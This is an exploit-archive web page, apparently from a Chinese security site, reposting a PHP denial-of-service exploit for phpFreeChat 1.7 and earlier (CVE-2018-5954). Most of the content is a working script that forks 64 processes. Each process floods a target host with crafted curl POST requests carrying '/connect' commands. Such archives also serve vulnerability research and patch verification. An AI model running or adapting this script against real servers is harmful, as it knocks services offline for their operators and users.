首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHPFreeChat 1.7 - Denial of Service 来源：vfocus.net 作者：Pakbaz 发布时间：2018-01-22   # Exploit Title: phpFreeChat 1.7 and earlier - Denial of Service # Version: 1.7 and earlier # Date: 21/01/2018 # Vendor Homepage: http://www.phpfreechat.net # Software Link: http://www.phpfreechat.net/download # Exploit Author: A. Pakbaz # CVE : CVE-2018-5954 #################################################### <?php $host="http://example.com/path/index.php";  //Vulnerable Host $con_num=64;    //Number of Connections $proxy='';  //Proxy example http://127.0.0.1:8080 $user_agent=''; //User-Agent $proxy=$proxy!='' ? "-x " . $proxy : ''; $user_agent=$user_agent!='' ? "-A " . $user_agent : ''; echo "##Vulnerability Discovered by A. Pakbaz\n##Exploit Author: A. Pakbaz\n"; echo "##Contact: \x70\x61\x6b\x62\x61\x7a\x40\x70\x72\x6f\x74\x6f\x6e\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\n"; echo "##PGP key: \x45\x33\x35\x35\x35\x32\x34\x43\x34\x44\x37\x45\x31\x36\x43\x38\x46\x38\x34\x38\x35\x41\x36\x46\x35\x31\x32\x39\x30\x34\x46\x35\x45\x44\x42\x45\x33\x43\x41\x41\n"; function runf($id){ global $con_num; global $host; global $proxy; global $user_agent; $i=$id*1000000/$con_num; $f=($id+1)*1000000/$con_num; for($num=$i; $num<$f; $num++){     `curl --url '$host' -X POST -d "pfc_ajax=1&f=handleRequest&cmd=%2Fconnect%20a95806d727683c9c42694214fe"$num"%200%20%22"$num"%22" -N --stderr /dev/null --compressed $proxy $user_agent`;     echo ".";       }       } function fmaker($pno){ global $con_num; if($pno>1){     $pid=pcntl_fork();     if($pid<0){         echo "\nError! Reduce the number of connections\n";         }     elseif($pid)         fmaker($pno-1);     else         runf($con_num-$pno); } elseif($pno==1)     runf($con_num-1); } fmaker($con_num); ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·macOS 10.13 (17A365) - Kernel ·Simple ASC CMS 1.2 Database Di ·Smiths Medical Medfusion 4000 ·NEC Univerge SV9100/SV8100 Web ·glibc - 'getcwd()' Local Privi ·MixPad 5.00 - Buffer Overflow ·Primefaces 5.x - Remote Code E ·RAVPower 2.000.056 - Memory Di ·GitStack 2.3.10 Remote Code Ex ·HP Connected Backup 8.6/8.8.6 ·Docker Sudo Privilege Escalati ·Photography CMS 1.0 - Cross-Si   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved